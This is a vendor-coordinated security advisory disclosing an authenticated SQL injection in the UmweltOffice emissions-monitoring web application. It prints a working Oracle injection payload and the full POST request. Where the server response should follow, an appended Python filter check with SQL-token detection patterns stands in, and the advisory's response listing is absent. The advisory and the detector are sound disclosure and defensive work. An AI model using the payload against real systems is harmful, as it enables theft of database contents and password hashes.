-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-074
Product: UmweltOffice
Manufacturer: Siempelkamp NIS Ingenieurgesellschaft mbH
Affected Version(s): <7.4.3
Tested Version(s): 7.4.1
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2024-08-28
Solution Date: 2024-11-11
Public Disclosure: 2024-11-25
CVE Reference: CVE-2024-8308
Authors of Advisory: Johannes Lauinger and Fidelis Abt, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

UmweltOffice by Siempelkamp NIS Ingenieurgesellschaft mbH is a system to
continuously monitor emission data and make it available in the form of
a web application. The application is also used to report emission data
to the respective authorities.

The manufacturer describes the product as follows (see [1]):

"TALAS/7 with the UmweltOffice® V.7 PC system is a complete, networkable
system for continuous acquisition, storage and analysis of emissions
data through all branches of industry according to the Technical
Instructions on Air Quality Control (TA-Luft), 13., 17., 27., 30. and
44. BImSchV - (German emission safety regulations)."

Due to improper handling of HTTP request input data, the web application
is vulnerable to SQL injection. The functionality shown to be affected
is accessible only after logging in to the application with any valid
credentials (including low-privileged accounts), making this an
authenticated SQL injection vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

After logging in to the application, it is possible to access stored
notifications. This functionality is available by first opening the
menu item "Input" ("Eingabe") and then "Notifications" ("Mitteilungen").

Notifications are shown in a list which can be filtered. To edit the
filter, the button "Edit Filter" ("Filter bearbeiten") is used. This
opens an input form with different filter options. Updating the filter
options results in an HTTP POST request being sent to the server.

This request is vulnerable to both error-based and time-based boolean
blind SQL injection in the following fields:

* filterBkbId
* filterAkbId
* filterMkbId

The vulnerability allows accessing the underlying Oracle DBMS and
exfiltrating all data, including the salted password hashes of all
users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The Oracle database version banner can be retrieved by setting the value
'filterBkbId' for the POST request '/emission/auswerten_mitteilungen.do'
as follows:

filterBkbId=1)) AND 42=DBMS_UTILITY.SQLID_TO_SQLHASH((SELECT banner FROM v$version FETCH FIRST 1 ROWS ONLY)) AND ((1=1

The full POST request sent to the application is shown in the following
listing, where the 'Host' and 'Content-Length' header values as well as
the session token have been redacted:

POST /emission/auswerten_mitteilungen.do HTTP/1.1
Content-Length: XXX
Host: xxx.xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

filterAnwenden=false&formid=frmFilter&radioZeit=mz&filterZeitVonString=2024-07-21&filterArtId=0&filterBkbId=1))+AND+42%3dDBMS_UTILITY.SQLID_TO_SQLHASH((SELECT+banner+FROM+v$version+FETCH+FIRST+1+ROWS+ONLY))+AND+((1%3d1&filterZeitBisString=2024-08-22&filterStatusId=1&filterAkbId=%2A12&filterDurchId=36&filterMkbId=-1&btnFilterAnwenden=clicked&btnBerichtPDF=&btnBerichtTXT=

The relevant part of the response which is returned by the application
is shown in the following:
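As an added example that is not part of the SySS advisory or the vendor's product, the following Python check decodes a form-encoded body like the one above and flags the three filter fields whenever a value is not a plain ID or carries SQL tokens. The accepted ID format, the token list and the sample bodies are assumptions constructed from the request shown in this advisory.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs

# The three filter fields the advisory names as injectable.
FILTER_FIELDS = ("filterBkbId", "filterAkbId", "filterMkbId")

# Assumption: a legitimate ID is a short run of digits, optionally prefixed
# with '-' or '*' (the advisory's request carries filterAkbId=*12, filterMkbId=-1).
ID_PATTERN = re.compile(r"^[-*]?\d{1,10}$")

# Tokens that never belong in an ID: quotes, parentheses, comment markers,
# SQL keywords, and the Oracle package/view prefixes used in the PoC.
SQL_TOKENS = re.compile(
    r"[()']|--|\bAND\b|\bOR\b|\bSELECT\b|\bUNION\b|\bFETCH\b|DBMS_|UTL_|v\$",
    re.IGNORECASE,
)


def check_filter_body(body: str) -> Dict[str, List[str]]:
    """Return {field: [reasons]} for each injectable field whose value looks hostile.
    parse_qs undoes the form encoding, so '+' and '%3d' come back as ' ' and '='.
    """
    params = parse_qs(body, keep_blank_values=True)
    findings: Dict[str, List[str]] = {}
    for field in FILTER_FIELDS:
        for value in params.get(field, []):
            reasons = []
            if not ID_PATTERN.match(value):
                reasons.append("not a well-formed ID")
            hits = sorted({m.group(0).upper() for m in SQL_TOKENS.finditer(value)})
            if hits:
                reasons.append("SQL tokens: " + " ".join(hits))
            if reasons:
                findings[field] = reasons
    return findings


# Constructed sample bodies: a benign filter update, and the advisory's PoC body.
BENIGN_BODY = ("filterAnwenden=false&formid=frmFilter&filterArtId=0&filterBkbId=1"
               "&filterStatusId=1&filterAkbId=%2A12&filterMkbId=-1")
POC_BODY = ("filterAnwenden=false&formid=frmFilter&filterBkbId=1))+AND+42%3dDBMS_UTILITY"
            ".SQLID_TO_SQLHASH((SELECT+banner+FROM+v$version+FETCH+FIRST+1+ROWS+ONLY))"
            "+AND+((1%3d1&filterAkbId=%2A12&filterMkbId=-1")

if __name__ == "__main__":
    print(check_filter_body(BENIGN_BODY))  # {}
    print(check_filter_body(POC_BODY))     # flags filterBkbId only
```

A check like this is a compensating control for detection at the edge (request logging or a WAF); the remedy for CWE-89 itself is to pass these values as bind variables rather than concatenating them into the query.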